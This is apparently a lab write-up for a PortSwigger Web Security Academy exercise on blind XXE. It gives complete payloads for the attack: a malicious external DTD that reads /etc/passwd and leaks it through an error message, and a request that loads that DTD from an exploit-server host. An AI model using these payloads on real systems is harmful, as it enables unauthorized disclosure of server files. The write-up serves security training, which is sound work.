# Lab: Exploiting blind XXE to retrieve data via error messages ###### tags: `Portswigger Web Security Academy` `Web` * Description: This lab has a "Check stock" feature that parses XML input but does not display the result. * Goal: To solve the lab, use an external DTD to trigger an error message that displays the contents of the `/etc/passwd` file. The lab contains a link to an exploit server on a different domain where you can host your malicious DTD. ## Recon This is very similar to the previous lab(Exploiting blind XXE to exfiltrate data using a malicious external DTD) 1. Complete Malicious Server Payload and Store ```xml <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>"> %eval; %exfil; ``` 2. Complete Intercept Packet Payload Intercept the packet that you click `Check stock` button in arbitrary product page. Copy and paste your malicious server URL to `YOUR-DTD-URL`, e.g. `https://exploit-{YOUR-RANDOM-URL}.exploit-server.net/exploit` ```xml <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]> ``` 3. Send packet!!! ## Exp :::spoiler Malicious Server Payload ```xml <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>"> %eval; %exfil; ``` ::: :::spoiler Intercept Packet Payload ```xml! <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0ad100a2040f8d8e821cce250179002c.exploit-server.net/exploit"> %xxe;]> <stockCheck> <productId> 1 </productId> <storeId> 1 </storeId> </stockCheck> ``` ::: :::spoiler Success Screenshot  ---  :::